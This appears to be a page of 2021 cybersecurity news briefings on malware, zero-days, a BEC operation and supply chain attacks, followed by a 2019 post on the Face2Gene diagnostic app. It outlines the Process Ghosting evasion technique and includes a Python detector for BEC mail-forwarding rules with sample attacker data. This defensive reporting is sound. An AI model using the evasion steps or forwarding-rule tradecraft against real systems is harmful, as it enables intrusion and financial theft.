Researchers at Check Point have published a report on the XLoader malware, a variant of the Formbook malware. According to the research, a new malware called XLoader, which advertises itself as a cross-platform botnet and is capable of stealing information on Windows and macOS systems, has recently been detected on underground forums. This new variant is known to have emerged in February 2021 and is an evolution of the well-known Formbook, a stealer that is still prevalent five years after it first appeared and that targets Windows machines. XLoader is a much more sophisticated malware than Formbook, with the ability to collect credentials from web browsers and some email clients, take screenshots, log keystrokes and execute other types of malware. It is offered as Malware-as-a-Service: customers can rent the macOS version and the vendor provides them with access to a server from which they can manage the compromised devices. In this way, the attackers also keep control over how their customers use the tool. Finally, it is worth noting that most of XLoader's victims are located in the US.

More details: https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/
July 23, 2021
Cyber Security
Cyber Security Weekly Briefing June 19-25
SonicWall fixes a critical vulnerability that had been partially fixed

In October last year, SonicWall fixed a critical buffer overflow vulnerability in SonicOS, identified as CVE-2020-5135, which affected more than 800,000 SonicWall VPN devices. This flaw allowed unauthenticated attackers to remotely execute code on the affected device or cause a denial of service by sending specially crafted HTTP requests to the firewall. However, security researcher Craig Young now reveals that this patch left a memory information exposure flaw uncorrected; it has been identified as CVE-2021-20019 and was not fixed until the most recent release of SonicOS.

More info: https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/

Zyxel alerts its customers of attacks against their devices

Zyxel has alerted customers via email about a series of attacks targeting the VPN systems, firewalls and load balancers that the company offers and that have SSL-VPN-enabled remote management. Specifically, these attacks are said to target USG, ZyWALL, USG FLEX, ATP and VPN series network devices running the ZLD firmware on-premises. According to Zyxel, the attacker tries to access the device via the WAN and, if successful, attempts to bypass the authentication systems and establish a VPN connection through an SSL tunnel with an unknown user (e.g. "zyxel_slIvpn", "zyxel_ts", "zyxel_vpn_test") in order to manipulate the device's configuration. At this stage, it is not known whether the entry vector for these attacks is an old vulnerability present in unpatched devices or a new 0-day vulnerability. Nevertheless, Zyxel has shared a number of mitigation measures against this threat.

All the details: https://therecord.media/zyxel-says-a-threat-actor-is-targeting-its-enterprise-firewall-and-vpn-devices/

Matanbuchus: new Malware-as-a-Service

Researchers at Palo Alto Networks' Unit 42 have published details of a new Malware-as-a-Service (MaaS) called Matanbuchus Loader. This MaaS was first spotted in February this year on underground forums linked to the BelialDemon threat actor, who set a price of $2,500 for its acquisition. The initial distribution vector for the artifact is an Excel document with malicious macros, which executes a file downloaded from an external domain. Matanbuchus has multiple capabilities, such as running .exe or .dll files in memory, leveraging the schtasks.exe scheduled task service for persistence, running PowerShell commands and using system executables to load DLL libraries. Palo Alto has identified several organisations affected by this malware in the US and Belgium.

Learn more: https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

DarkRadiation: New ransomware targeting GNU/Linux systems with worm-like functionality

Trend Micro researchers have analysed the workings of a recently discovered ransomware, named DarkRadiation, that targets GNU/Linux systems. It is fully implemented in Bash and most of its components target Red Hat and CentOS distributions, with Debian-based distributions targeted to a lesser extent. This ransomware uses the Telegram API to communicate with the C&C server and has worm-like functionality over the SSH protocol. To evade detection it uses the open source obfuscation tool "node-bash-obfuscate", with which the attackers obtain zero detections on VirusTotal. Researchers have observed that this ransomware is under continuous development, with multiple versions belonging to different campaigns.

More details: https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html
June 25, 2021
Cyber Security
Cyber Security Weekly Briefing June 12-18
0-day vulnerability in Chrome, the seventh so far this year

Yesterday, 17 June, Google released version 91.0.4472.114 of Chrome for Windows, Mac and Linux, resolving a 0-day vulnerability classified as CVE-2021-30554. Exploitation of this flaw could lead to arbitrary code execution on systems running unpatched versions of Chrome. Google has not disclosed any further information about the security issue until most users have updated their browsers. This type of 0-day vulnerability has recently been exploited by the PuzzleMaker threat actor in order to escape the browser's sandbox and install malware on Windows systems. Additionally, the update has addressed three other serious browser vulnerabilities, affecting the Chrome Sharing, WebAudio and TabGroups components, which have been identified as CVE-2021-30555, CVE-2021-30556 and CVE-2021-30557.

https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html

0-day vulnerabilities in Apple

Apple has issued security updates to address two 0-day vulnerabilities affecting its iOS 12 mobile operating system. The fixed flaws, listed as CVE-2021-30761 and CVE-2021-30762, are due to issues in the WebKit browser engine and could allow an attacker to execute arbitrary code when processing specially crafted malicious web content. The firm warns that these vulnerabilities are being actively exploited. The security update also addresses a memory corruption issue in the ASN.1 decoder, listed as CVE-2021-30737, which would allow remote code execution. The devices affected by these flaws are the iPhone 5s, iPhone 6s, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3 and iPod touch (6th generation), all of which are patched with iOS version 12.5.4.

https://support.apple.com/en-us/HT212548

Microsoft stops a high-impact BEC operation

The Microsoft 365 Defender research team, together with the Microsoft Threat Intelligence Centre (MSTIC), has discovered and disrupted the infrastructure of a large-scale BEC operation. In their analysis, they explain that the threat actors were exploiting various cloud-hosted web services to compromise email inboxes and add forwarding rules, using different IPs and adding time delays between actions in order to go undetected by security systems. To gain initial access to the victim's mailbox they used credentials obtained through social engineering: phishing emails with an attached HTML file containing JavaScript that imitated a Microsoft login page. Once the user's credentials were compromised, they would access the mailbox and add forwarding rules with parameters such as "invoice", "payment" or "statement", which gave them access to financial information as well as a persistent exfiltration channel. They also allegedly created rules to delete the mails that were forwarded to their infrastructure, making their operations harder to detect.

https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/

New malware evasion technique

Security researchers at Elastic have made public a new executable image manipulation technique, called "Process Ghosting", which could be used by attackers to evade protections and stealthily execute malicious code on Windows. With this technique, a threat actor could place a malware component on the victim computer's disk in a way that makes it difficult to detect. The evasion takes advantage of the time lag between the creation of a process and the moment the device's security systems are notified of its creation, giving attackers a window in which to evade detection. The flow of the Process Ghosting attack starts by creating a file and setting it to "delete-pending" status, which prevents it from being opened or read; an image section is then created from the file on disk after the malicious code has been written to it, and finally the file is deleted. The next step is to create a process from that section with the relevant environment variables and then a thread to execute it. The attack succeeds because the callbacks to security systems such as antivirus are made when the thread is created, at which point they try to read an already deleted file, and so the security checks are bypassed.

https://www.elastic.co/es/blog/process-ghosting-a-new-executable-image-tampering-attack

Attack on CCTV provider's supply chain

FireEye's Mandiant team has published an investigation into a new supply chain attack. The attackers in this incident, identified as UNC2465, a group affiliated with the DarkSide ransomware, breached a legitimate website of a closed-circuit television (CCTV) camera vendor and deployed a trojan inside a security camera PVR installer that users downloaded to configure and control their security devices. Installing the malicious software also triggered the download of the Smokedham or Beacon trojan, among others. The researchers did not detect the presence of the DarkSide ransomware on the victims' networks, mainly because this intrusion took place between 18 May and early June, and by that time DarkSide had already announced that it was ceasing its activity after the Colonial Pipeline attack.

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

Critical vulnerability in ThroughTek supply chain

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning regarding a critical software supply chain flaw affecting ThroughTek's software development kit (SDK). Successful exploitation of this vulnerability could allow unauthorised access to sensitive information, such as audio/video streams from security cameras. The flaw, listed as CVE-2021-32934 with a CVSS score of 9.1, affects ThroughTek P2P products in versions 3.1.5 and earlier, as well as versions with the nossl tag and various firmware configurations.

https://us-cert.cisa.gov/ics/advisories/icsa-21-166-01
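The BEC item above describes the tradecraft Microsoft observed: forwarding rules keyed on "invoice", "payment" or "statement", rules that delete the forwarded copies, and rule changes made from different IPs with delays between them. The following is an added example, not code from Microsoft's report, that scores constructed inbox-rule audit events against those traits; the field names, the organisation's domain (example.com) and the "known corporate range" 192.0.2.0/24 are assumptions for the illustration.

```python
"""Heuristic triage of inbox-rule changes for BEC-style forwarding.

Added example (not from the Microsoft write-up). The event fields are a
simplified stand-in for Microsoft 365 New-InboxRule / Set-InboxRule audit
records; the domain and IP ranges below are assumptions.
"""
from dataclasses import dataclass, field
from datetime import datetime
import ipaddress

INTERNAL_DOMAIN = "example.com"                     # assumption: the org's own domain
KNOWN_RANGES = [ipaddress.ip_network("192.0.2.0/24")]  # assumption: corporate egress
SUSPICIOUS_KEYWORDS = {"invoice", "payment", "statement"}  # keywords named in the report


@dataclass
class RuleEvent:
    user: str
    time: datetime
    client_ip: str
    operation: str                                  # e.g. New-InboxRule
    forward_to: list = field(default_factory=list)  # ForwardTo / RedirectTo targets
    subject_contains: list = field(default_factory=list)
    delete_message: bool = False


def external_targets(ev: RuleEvent) -> list:
    """Forwarding targets outside the organisation's own domain."""
    suffix = "@" + INTERNAL_DOMAIN
    return [a for a in ev.forward_to if not a.lower().endswith(suffix)]


def ip_outside_known_ranges(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in KNOWN_RANGES)


def score_event(ev: RuleEvent):
    """Score one rule change on its own; returns (score, reasons)."""
    reasons = []
    ext = external_targets(ev)
    if ext:
        reasons.append(f"forwards to external address {ext}")
    hits = sorted(w for w in SUSPICIOUS_KEYWORDS
                  if any(w in s.lower() for s in ev.subject_contains))
    if hits:
        reasons.append(f"filters on financial keywords {hits}")
    if ev.delete_message:
        reasons.append("deletes matching mail (hides forwarded copies)")
    if ip_outside_known_ranges(ev.client_ip):
        reasons.append(f"rule set from {ev.client_ip}, outside known ranges")
    return len(reasons), reasons


def per_user_context(events):
    """Per mailbox: how many distinct source IPs, and over how many hours."""
    by_user = {}
    for ev in events:
        by_user.setdefault(ev.user, []).append(ev)
    ctx = {}
    for user, evs in by_user.items():
        times = [e.time for e in evs]
        span_h = (max(times) - min(times)).total_seconds() / 3600
        ctx[user] = {"distinct_ips": len({e.client_ip for e in evs}),
                     "span_hours": span_h}
    return ctx


def triage(events, threshold: int = 2):
    """Return alerts for events whose combined score reaches the threshold."""
    ctx = per_user_context(events)
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        c = ctx[ev.user]
        # The report notes rule changes spread over time from different IPs.
        if c["distinct_ips"] > 1 and c["span_hours"] >= 1:
            score += 1
            reasons.append(f"{c['distinct_ips']} source IPs over {c['span_hours']:.1f}h")
        if score >= threshold:
            alerts.append({"user": ev.user, "time": ev.time.isoformat(),
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (not real audit data).
SAMPLE_EVENTS = [
    RuleEvent("alice@example.com", datetime(2021, 6, 1, 8, 0), "203.0.113.10",
              "New-InboxRule", forward_to=["collector@attacker.invalid"],
              subject_contains=["Invoice"]),
    RuleEvent("alice@example.com", datetime(2021, 6, 1, 20, 30), "198.51.100.7",
              "New-InboxRule", subject_contains=["payment", "statement"],
              delete_message=True),
    RuleEvent("bob@example.com", datetime(2021, 6, 2, 9, 0), "192.0.2.5",
              "New-InboxRule", forward_to=["bob.archive@example.com"],
              subject_contains=["newsletter"]),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```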
June 18, 2021
AI of Things
Machine Learning identifying rare genetic disorders
Did you know that Machine Learning is already being used to help doctors identify rare genetic disorders by analysing images of people's faces? The number of genetic illnesses is so overwhelming that in some cases it is difficult to reach a definite diagnosis because, although each one has characteristics that differentiate it from the others, the symptoms very often present themselves in a similar way. The journal Nature Medicine has just published an article about a smartphone app, Face2Gene, that is capable of identifying facial features in photos that are characteristic of certain genetic and neurological disorders. The technology analyses the patient's photo using mathematical facial descriptors that are compared with the gestalt of different syndromes. It then quantifies their similarity and offers a prioritised list of syndromes with a similar morphology. Face2Gene was created by FDNA, one of the leading companies in artificial intelligence applications for genetic diagnosis. Their initial objective was to create an app capable of identifying syndromes such as Angelman, Noonan and Cornelia de Lange, three rare genetic disorders with distinct facial characteristics.

Figure 2. Source: FDNA

To do this, they fed the algorithm more than 17,000 images of diagnosed cases covering 216 different syndromes, which produced exceptional diagnostic results. The app does not claim to provide definitive diagnoses. Doctors use it for a second opinion, or even as a point of reference when they do not know how to interpret a patient's symptoms that may involve a rare genetic disorder.

Figure 3. Source: FDNA

Thus, Artificial Intelligence becomes a way of achieving a more accurate diagnosis, of saving time, and of saving the costs associated with 'amplified range' genetic testing, which will no longer be the only means of radically narrowing the list of possible diagnoses. For Face2Gene to offer strong diagnoses, it needs data. The good news is that health professionals have agreed to upload patient photos to the application (whose database now holds over 150,000 images), which has improved the program's precision.

Figure 4. Source: FDNA

It is fundamentally important that a lot of data is shared in order to avoid racial biases and to achieve a balanced representation of different populations, so that people all around the world can be treated. Early diagnosis is crucial for these types of illnesses. It is amazing to think that one day soon paediatricians and geneticists may be using these kinds of apps with the same ease with which they use their stethoscope.
February 18, 2019